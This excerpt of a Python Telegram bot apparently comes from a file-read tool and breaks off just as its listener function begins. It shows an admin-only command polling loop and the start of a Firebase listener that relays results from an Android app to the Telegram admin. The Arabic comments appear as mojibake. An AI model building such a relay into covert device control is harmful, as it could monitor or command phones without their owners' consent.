   407в†’   407в†’  3406в†’                log.warning("getMe failed: %s", me)
   408в†’   408в†’  3407в†’        await asyncio.sleep(1)
   409в†’   409в†’  3408в†’    except Exception as exc:
   410в†’   410в†’  3409в†’        log.warning("Connection cleanup: %s", exc)
   411в†’   411в†’  3410в†’    
   412в†’   412в†’  3411в†’    log.info("Starting Telegram getUpdates polling...")
   413в†’   413в†’  3412в†’    
   414в†’   414в†’  3413в†’    _conflict_count = 0
   415в†’   415в†’  3414в†’    while polling_active:
   416в†’   416в†’  3415в†’        try:
   417в†’   417в†’  3416в†’            payload = {
   418в†’   418в†’  3417в†’                "offset": tg_offset,
   419в†’   419в†’  3418в†’                "timeout": 30,
   420в†’   420в†’  3419в†’                "allowed_updates": ["message", "callback_query"],
   421в†’   421в†’  3420в†’            }
   422в†’   422в†’  3421в†’            result = await tg_request("getUpdates", payload)
   423в†’   423в†’  3422в†’            if not result or not result.get("ok"):
   424в†’   424в†’  3423в†’                desc = (result or {}).get("description", "")
   425в†’   425в†’  3424в†’                if "Conflict" in desc:
   426в†’   426в†’  3425в†’                    _conflict_count += 1
   427в†’   427в†’  3426в†’                    log.warning("Conflict detected (%d), waiting...", _conflict_count)
   428в†’   428в†’  3427в†’                    await asyncio.sleep(8)
   429в†’   429в†’  3428в†’                else:
   430в†’   430в†’  3429в†’                    await asyncio.sleep(2)
   431в†’   431в†’  3430в†’                continue
   432в†’   432в†’  3431в†’            _conflict_count = 0  # ШҐШ№Ш§ШЇШ© Ш§Щ„Ш№ШЇШ§ШЇ Ш№Щ†ШЇ Ш§Щ„Щ†Ш¬Ш§Ш­
   433в†’   433в†’  3432в†’            
   434в†’   434в†’  3433в†’            updates = result.get("result", [])
   435в†’   435в†’  3434в†’            for update in updates:
   436в†’   436в†’  3435в†’                update_id = update.get("update_id", 0)
   437в†’   437в†’  3436в†’                tg_offset = update_id + 1
   438в†’   438в†’  3437в†’                
   439в†’   439в†’  3438в†’                # === Щ…Щ†Ш№ ШЄЩѓШ±Ш§Ш± Щ…Ш№Ш§Щ„Ш¬Ш© Щ†ЩЃШі Ш§Щ„ШЄШ­ШЇЩЉШ« ===
   440в†’   440в†’  3439в†’                if update_id in _processed_update_ids:
   441в†’   441в†’  3440в†’                    continue
   442в†’   442в†’  3441в†’                _processed_update_ids.add(update_id)
   443в†’   443в†’  3442в†’                if len(_processed_update_ids) > 1000:
   444в†’   444в†’  3443в†’                    _processed_update_ids = set(list(_processed_update_ids)[-500:])
   445в†’   445в†’  3444в†’                
   446в†’   446в†’  3445в†’                # Handle message
   447в†’   447в†’  3446в†’                if "message" in update:
   448в†’   448в†’  3447в†’                    msg = update["message"]
   449в†’   449в†’  3448в†’                    chat_id = msg.get("chat", {}).get("id")
   450в†’   450в†’  3449в†’                    text = msg.get("text", "")
   451в†’   451в†’  3450в†’                    msg_id = msg.get("message_id", 0)
   452в†’   452в†’  3451в†’                    
   453в†’   453в†’  3452в†’                    # === Щ…Щ†Ш№ ШЄЩѓШ±Ш§Ш± Щ…Ш№Ш§Щ„Ш¬Ш© Щ†ЩЃШі Ш§Щ„Ш±ШіШ§Щ„Ш© ШЁШ§Щ„Ш¶ШЁШ· ===
   454в†’   454в†’  3453в†’                    msg_key = f"{chat_id}:{msg_id}"
   455в†’   455в†’  3454в†’                    if msg_key in _processed_message_keys:
   456в†’   456в†’  3455в†’                        continue
   457в†’   457в†’  3456в†’                    _processed_message_keys.add(msg_key)
   458в†’   458в†’  3457в†’                    if len(_processed_message_keys) > 500:
   459в†’   459в†’  3458в†’                        _processed_message_keys = set(list(_processed_message_keys)[-200:])
   460в†’   460в†’  3459в†’                    
   461в†’   461в†’  3460в†’                    if chat_id != ADMIN_CHAT_ID:
   462в†’   462в†’  3461в†’                        log.warning("Unauthorized access from %s", chat_id)
   463в†’   463в†’  3462в†’                        continue
   464в†’   464в†’  3463в†’                    
   465в†’   465в†’  3464в†’                    if text.startswith("/"):
   466в†’   466в†’  3465в†’                        await handle_telegram_command(chat_id, text, msg_id)
   467в†’   467в†’  3466в†’                
   468в†’   468в†’  3467в†’                # Handle callback query
   469в†’   469в†’  3468в†’                if "callback_query" in update:
   470в†’   470в†’  3469в†’                    cb = update["callback_query"]
   471в†’   471в†’  3470в†’                    cb_id = cb.get("id", "")
   472в†’   472в†’  3471в†’                    cb_chat = cb.get("message", {}).get("chat", {}).get("id")
   473в†’   473в†’  3472в†’                    
   474в†’   474в†’  3473в†’                    # === Щ…Щ†Ш№ ШЄЩѓШ±Ш§Ш± Щ…Ш№Ш§Щ„Ш¬Ш© Щ†ЩЃШі Ш§Щ„ЩЂ callback ===
   475в†’   475в†’  3474в†’                    cb_key = f"cb:{cb_id}"
   476в†’   476в†’  3475в†’                    if cb_key in _processed_message_keys:
   477в†’   477в†’  3476в†’                        continue
   478в†’   478в†’  3477в†’                    _processed_message_keys.add(cb_key)
   479в†’   479в†’  3478в†’                    
   480в†’   480в†’  3479в†’                    if cb_chat != ADMIN_CHAT_ID:
   481в†’   481в†’  3480в†’                        continue
   482в†’   482в†’  3481в†’                    await handle_callback_query(cb)
   483в†’   483в†’  3482в†’        
   484в†’   484в†’  3483в†’        except asyncio.CancelledError:
   485в†’   485в†’  3484в†’            break
   486в†’   486в†’  3485в†’        except Exception as exc:
   487в†’   487в†’  3486в†’            log.error("Poll error: %s", exc)
   488в†’   488в†’  3487в†’            await asyncio.sleep(3)
   489в†’   489в†’  3488в†’
   490в†’   490в†’  3489в†’# ============================================================================
   491в†’   491в†’  3490в†’# FIREBASE COMMAND RESULT LISTENER
   492в†’   492в†’  3491в†’# ============================================================================
   493в†’   493в†’  3492в†’
   494в†’   494в†’  3493в†’async def firebase_result_listener():
   495в†’   495в†’  3494в†’    """Background task: Poll Firebase for results from Android app.
   496в†’   496в†’  3495в†’    ACTIVE mode - forwards results to Telegram admin."""
   497в†’   497в†’  3496в†’    global _processed_results
   498в†’   498в†’  3497в†’    log.info("Firebase result listener started (ACTIVE mode)")
   499в†’   499в†’  3498в†’
   500в†’   500в†’  3499в†’    # Clean ALL old results AND commands on startup to prevent re-processing spam
   501в†’
   502в†’[showing lines 1-500 of 502; use offset=501 with limit to continue reading]